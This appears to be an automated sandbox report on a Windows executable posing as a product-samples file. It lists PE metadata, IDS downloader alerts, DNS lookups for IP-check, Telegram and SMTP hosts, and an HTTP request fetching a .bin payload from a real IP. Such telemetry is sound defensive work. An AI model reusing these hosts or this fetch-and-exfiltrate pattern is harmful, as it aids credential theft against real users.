| .data | 0x9000 | 0x3997f8 | 0x400 | 3e7188ab31a597163972f006b0a1b0b0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x3a3000 | 0x1d000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x3c0000 | 0xdbd8 | 0xdc00 | a72c7056af1a0fa33cb886ea0b058fbb | False | 0.09834872159090909 | data | 3.8171742903256005 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_ICON | 0x3c01d8 | 0xd228 | Device independent bitmap graphic, 101 x 256 x 32, image size 51712, resolution 9055 x 9055 px/m | English | United States | 0.07864312267657993 |
| RT_DIALOG | 0x3cd400 | 0x100 | data | English | United States | 0.5234375 |
| RT_DIALOG | 0x3cd500 | 0xf8 | data | English | United States | 0.6330645161290323 |
| RT_DIALOG | 0x3cd5f8 | 0x60 | data | English | United States | 0.7291666666666666 |
| RT_GROUP_ICON | 0x3cd658 | 0x14 | data | English | United States | 1.15 |
| RT_VERSION | 0x3cd670 | 0x25c | data | English | United States | 0.5165562913907285 |
| RT_MANIFEST | 0x3cd8d0 | 0x305 | XML 1.0 document, ASCII text, with very long lines (773), with no line terminators | English | United States | 0.5614489003880984 |
| DLL | Import |
|---|---|
| KERNEL32.dll | Sleep, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, CompareFileTime, SearchPathA, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, SetFileAttributesA, lstrcmpiA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, GetModuleHandleA, LoadLibraryExA, GetCommandLineA, GetTempPathA, FreeLibrary, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, MulDiv, WriteFile, MultiByteToWideChar |
| USER32.dll | CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA |
| GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
| SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA |
| ADVAPI32.dll | RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA |
| COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
| ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize |
| VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA |
| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-09-24T16:31:07.421987+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.30 | 49809 | 64.188.18.75 | 80 | TCP |
| 2024-09-24T16:31:10.828763+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:13.562087+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:14.013711+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.11.30 | 49812 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:14.296332+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:14.742507+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.11.30 | 49813 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:16.061568+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:16.515085+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.11.30 | 49814 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:16.795757+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:17.255560+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.11.30 | 49815 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:17.592467+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:18.066005+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.11.30 | 49816 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:18.951543+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:19.413571+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.11.30 | 49817 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:19.717044+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:20.165549+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.11.30 | 49818 | 172.67.177.134 | 443 | TCP |
| 2024-09-24T16:31:20.466845+0200 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.11.30 | 49810 | 158.101.44.242 | 80 | TCP |
| 2024-09-24T16:31:20.928000+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.11.30 | 49819 | 172.67.177.134 | 443 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                    Sep 24, 2024 16:31:07.858974934 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.858997107 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.859086990 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.859252930 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.966357946 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966468096 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966547966 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966609955 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966670990 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966732979 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966758013 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.966758013 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.966794014 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966855049 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966917038 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.966927052 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.966976881 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967037916 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967093945 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967097998 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967159986 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967221975 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967267990 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967268944 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967268944 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967283964 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967345953 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967406988 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967432976 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967468977 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967530966 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967592001 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967605114 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967606068 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967652082 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967714071 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967773914 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967818022 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967818975 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967842102 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967926025 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967989922 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.967988968 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967988968 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.967988968 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968051910 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968105078 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968112946 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968195915 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968276978 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968277931 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968286991 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968346119 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968401909 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968451023 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968451023 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968457937 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968513966 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968569040 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968612909 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968612909 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968624115 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968678951 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968734980 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968785048 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968785048 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.968791008 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968846083 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968900919 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.968959093 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.969013929 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.969016075 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.969017029 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.969069958 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.969116926 CEST804980964.188.18.75192.168.11.30
                                                                                    Sep 24, 2024 16:31:07.969131947 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.969132900 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.969347000 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:07.969347000 CEST4980980192.168.11.3064.188.18.75
                                                                                    Sep 24, 2024 16:31:10.146998882 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:10.306575060 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:10.307049036 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:10.307245016 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:10.466943026 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:10.468969107 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:10.515968084 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:10.579926968 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:10.780144930 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:10.828763008 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:11.605926991 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:11.605969906 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:11.606194973 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:11.644723892 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:11.644737959 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:11.883245945 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:11.883503914 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:11.889650106 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:11.889688969 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:11.890120983 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:11.937504053 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:12.575345993 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:12.616238117 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.031892061 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.032385111 CEST44349811172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.032543898 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:13.037396908 CEST49811443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:13.139579058 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:13.340534925 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.510498047 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.511519909 CEST49812443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:13.511639118 CEST44349812172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.511903048 CEST49812443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:13.511993885 CEST49812443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:13.512046099 CEST44349812172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.562087059 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:13.739794016 CEST44349812172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:13.741363049 CEST49812443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:13.741409063 CEST44349812172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.013746023 CEST44349812172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.014264107 CEST44349812172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.014532089 CEST49812443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.014837980 CEST49812443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.071763992 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:14.231560946 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.240473986 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.241241932 CEST49813443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.241298914 CEST44349813172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.241499901 CEST49813443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.241736889 CEST49813443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.241769075 CEST44349813172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.296331882 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:14.473143101 CEST44349813172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.474553108 CEST49813443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.474626064 CEST44349813172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.742523909 CEST44349813172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.742953062 CEST44349813172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:14.743170977 CEST49813443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.743439913 CEST49813443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:14.834005117 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:15.034512043 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.010607958 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.011887074 CEST49814443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.011995077 CEST44349814172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.012162924 CEST49814443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.013062954 CEST49814443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.013127089 CEST44349814172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.061568022 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:16.237958908 CEST44349814172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.239386082 CEST49814443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.239418030 CEST44349814172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.515086889 CEST44349814172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.515248060 CEST44349814172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.515438080 CEST49814443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.515857935 CEST49814443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.587178946 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:16.747169971 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.747762918 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.748270035 CEST49815443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.748385906 CEST44349815172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.748622894 CEST49815443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.748776913 CEST49815443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.748848915 CEST44349815172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.795757055 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:16.985651970 CEST44349815172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:16.987250090 CEST49815443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:16.987318039 CEST44349815172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.255599022 CEST44349815172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.256242037 CEST44349815172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.256467104 CEST49815443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:17.256705046 CEST49815443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:17.341846943 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:17.542385101 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.550138950 CEST8049810158.101.44.242192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.550945044 CEST49816443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:17.551103115 CEST44349816172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.551299095 CEST49816443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:17.551455975 CEST49816443192.168.11.30172.67.177.134
                                                                                    Sep 24, 2024 16:31:17.551527977 CEST44349816172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.592467070 CEST4981080192.168.11.30158.101.44.242
                                                                                    Sep 24, 2024 16:31:17.782279015 CEST44349816172.67.177.134192.168.11.30
                                                                                    Sep 24, 2024 16:31:17.783651114 CEST49816443192.168.11.30172.67.177.134
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 24, 2024 16:31:09.990879059 CEST | 61520 | 53 | 192.168.11.30 | 1.1.1.1
Sep 24, 2024 16:31:10.102323055 CEST | 53 | 61520 | 1.1.1.1 | 192.168.11.30
Sep 24, 2024 16:31:11.469243050 CEST | 50891 | 53 | 192.168.11.30 | 1.1.1.1
Sep 24, 2024 16:31:11.605166912 CEST | 53 | 50891 | 1.1.1.1 | 192.168.11.30
Sep 24, 2024 16:31:21.219433069 CEST | 49214 | 53 | 192.168.11.30 | 1.1.1.1
Sep 24, 2024 16:31:21.329202890 CEST | 53 | 49214 | 1.1.1.1 | 192.168.11.30
Sep 24, 2024 16:31:28.686060905 CEST | 54710 | 53 | 192.168.11.30 | 1.1.1.1
Sep 24, 2024 16:31:28.797579050 CEST | 53 | 54710 | 1.1.1.1 | 192.168.11.30
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 24, 2024 16:31:09.990879059 CEST | 192.168.11.30 | 1.1.1.1 | 0xd8b7 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Sep 24, 2024 16:31:11.469243050 CEST | 192.168.11.30 | 1.1.1.1 | 0xad35 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Sep 24, 2024 16:31:21.219433069 CEST | 192.168.11.30 | 1.1.1.1 | 0xcf0 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Sep 24, 2024 16:31:28.686060905 CEST | 192.168.11.30 | 1.1.1.1 | 0x43cb | Standard query (0) | smtp.zoho.eu | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 24, 2024 16:31:10.102323055 CEST | 1.1.1.1 | 192.168.11.30 | 0xd8b7 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 24, 2024 16:31:10.102323055 CEST | 1.1.1.1 | 192.168.11.30 | 0xd8b7 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Sep 24, 2024 16:31:10.102323055 CEST | 1.1.1.1 | 192.168.11.30 | 0xd8b7 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Sep 24, 2024 16:31:10.102323055 CEST | 1.1.1.1 | 192.168.11.30 | 0xd8b7 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Sep 24, 2024 16:31:10.102323055 CEST | 1.1.1.1 | 192.168.11.30 | 0xd8b7 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Sep 24, 2024 16:31:10.102323055 CEST | 1.1.1.1 | 192.168.11.30 | 0xd8b7 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Sep 24, 2024 16:31:11.605166912 CEST | 1.1.1.1 | 192.168.11.30 | 0xad35 | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Sep 24, 2024 16:31:11.605166912 CEST | 1.1.1.1 | 192.168.11.30 | 0xad35 | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Sep 24, 2024 16:31:21.329202890 CEST | 1.1.1.1 | 192.168.11.30 | 0xcf0 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Sep 24, 2024 16:31:28.797579050 CEST | 1.1.1.1 | 192.168.11.30 | 0x43cb | No error (0) | smtp.zoho.eu | | 185.230.214.164 | A (IP address) | IN (0x0001) | false
                                                                                    • reallyfreegeoip.org
                                                                                    • api.telegram.org
                                                                                    • 64.188.18.75
                                                                                    • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.30 | 49809 | 64.188.18.75 | 80 | 3392 | C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe

Timestamp | Bytes transferred | Direction | Data
Sep 24, 2024 16:31:07.313019991 CEST | 189 | OUT | GET /ReySnONaTTPqhXrIqUlWWanbq212.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: 64.188.18.75
Cache-Control: no-cache
Sep 24, 2024 16:31:07.421670914 CEST | 1289 | IN | HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Mon, 23 Sep 2024 23:30:37 GMT
Accept-Ranges: bytes
ETag: "3441279810edb1:0"
Server: Microsoft-IIS/8.5
Date: Tue, 24 Sep 2024 14:31:07 GMT
Content-Length: 208448


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
